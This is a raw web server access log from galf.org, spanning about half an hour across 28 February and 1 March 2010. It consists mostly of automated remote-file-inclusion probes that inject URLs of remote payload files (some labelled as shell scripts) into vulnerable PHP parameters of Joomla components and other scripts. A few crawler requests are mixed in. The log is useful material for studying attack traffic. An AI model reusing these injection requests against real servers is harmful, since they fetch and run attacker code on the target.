211.232.45.121 - - [28/Feb/2010:23:48:40 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:48:40 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:48:40 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:48:41 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:51:03 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:51:04 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:51:06 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:51:50 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:51:50 -0800] "GET /logs/access_091228.log/error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:51:50 -0800] "GET /error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:51:50 -0800] "GET /logs/error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:51:50 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:51:51 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:52:06 -0800] "GET /logs/error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.234.201.2 - - [28/Feb/2010:23:52:06 -0800] "GET /logs/access.log/error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.234.201.2 - - [28/Feb/2010:23:52:06 -0800] "GET /error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.143.29.250 - - [28/Feb/2010:23:53:43 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.143.29.250 - - [28/Feb/2010:23:53:43 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.143.29.250 - - [28/Feb/2010:23:53:43 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
123.143.29.250 - - [28/Feb/2010:23:54:13 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:23:54:14 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:23:54:14 -0800] "GET /logs/access_100222.log%20%20/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:54:29 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:54:29 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:54:29 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:56:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:56:24 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:56:24 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:57:15 -0800] "GET /logs/access_091221.log/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [28/Feb/2010:23:57:45 -0800] "GET /logs/access_100104.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [28/Feb/2010:23:58:05 -0800] "GET /logs/access_100118.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:58:18 -0800] "GET /logs/access_091102.log/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.132 - - [28/Feb/2010:23:58:29 -0800] "GET /logs/access_100104.log//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.55.227.132 - - [28/Feb/2010:23:58:30 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.55.227.132 - - [28/Feb/2010:23:58:30 -0800] "GET /logs//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:59:02 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:59:02 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:59:02 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:59:59 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:59:59 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:59:59 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [01/Mar/2010:00:01:27 -0800] "GET /logs/access_091221.log/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:00:01:32 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.111.3.35 - - [01/Mar/2010:00:01:32 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.111.3.35 - - [01/Mar/2010:00:01:33 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.111.3.35 - - [01/Mar/2010:00:01:42 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:00:01:42 -0800] "GET /logs/access_100222.log%20%20/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:00:01:42 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [01/Mar/2010:00:02:26 -0800] "GET /logs/access_091102.log/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [01/Mar/2010:00:03:07 -0800] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [01/Mar/2010:00:03:08 -0800] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.204.193 - - [01/Mar/2010:00:03:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.55.148.208 - - [01/Mar/2010:00:03:37 -0800] "GET /logs/access_091221.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.148.208 - - [01/Mar/2010:00:03:37 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.148.208 - - [01/Mar/2010:00:03:37 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.148.208 - - [01/Mar/2010:00:03:41 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.148.208 - - [01/Mar/2010:00:03:41 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.148.208 - - [01/Mar/2010:00:03:46 -0800] "GET /logs/access_091221.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://endeavor-enterprises.com//entropybanner/.../a1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.204.193 - - [01/Mar/2010:00:04:44 -0800] "GET /logs/ HTTP/1.1" 200 4799 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:06:39 -0800] "GET /logs/access_091207.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:06:39 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:06:39 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:06:57 -0800] "GET /admin/templates/template_thumbnail.php?thumb_template=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:06:57 -0800] "GET /logs//admin/templates/template_thumbnail.php?thumb_template=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:06:57 -0800] "GET /logs/access_100111.log//admin/templates/template_thumbnail.php?thumb_template=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [01/Mar/2010:00:07:09 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.111.3.35 - - [01/Mar/2010:00:07:19 -0800] "GET /logs/access_100222.log/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [01/Mar/2010:00:08:49 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.55.227.145 - - [01/Mar/2010:00:08:49 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.55.227.145 - - [01/Mar/2010:00:08:49 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.55.227.145 - - [01/Mar/2010:00:09:09 -0800] "GET /logs/access_100222.log%20%20/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [01/Mar/2010:00:09:09 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [01/Mar/2010:00:09:10 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.171.225 - - [01/Mar/2010:00:11:07 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Plukkie/1.3; http://www.botje.com/plukkie.htm)" "www.galf.org"
85.17.171.225 - - [01/Mar/2010:00:11:07 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Plukkie/1.3; http://www.botje.com/plukkie.htm)" "www.galf.org"
222.122.25.99 - - [01/Mar/2010:00:11:14 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
222.122.25.99 - - [01/Mar/2010:00:11:14 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
207.46.199.46 - - [01/Mar/2010:00:11:17 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:13:42 -0800] "GET /logs/access_091207.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:13:43 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:13:43 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [01/Mar/2010:00:13:51 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.55.227.145 - - [01/Mar/2010:00:14:05 -0800] "GET /logs/access_100222.log/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:14:35 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:14:35 -0800] "GET /logs/access_091207.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.39.140.100 - - [01/Mar/2010:00:14:35 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:17:46 -0800] "GET /logs/access_090907.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:17:46 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:17:46 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:05 -0800] "GET /logs/access_090810.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:06 -0800] "GET /logs/access_090817.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:09 -0800] "GET /logs/access_090831.log HTTP/1.1" 200 2359296 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:10 -0800] "GET /logs/access_090907.log HTTP/1.1" 200 2883584 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:11 -0800] "GET /logs/access_090921.log HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:15 -0800] "GET /logs/access_090928.log HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:17 -0800] "GET /logs/access_091123.log HTTP/1.1" 200 2883584 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:23 -0800] "GET /logs/access_091130.log HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:24 -0800] "GET /logs/access_091214.log HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [01/Mar/2010:00:21:29 -0800] "GET /logs/access_091228.log HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:36 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:36 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:36 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:39 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:39 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:39 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:44 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:45 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:47 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:47 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:47 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:47 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:47 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.230.63.44 - - [01/Mar/2010:00:24:48 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:24:49 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
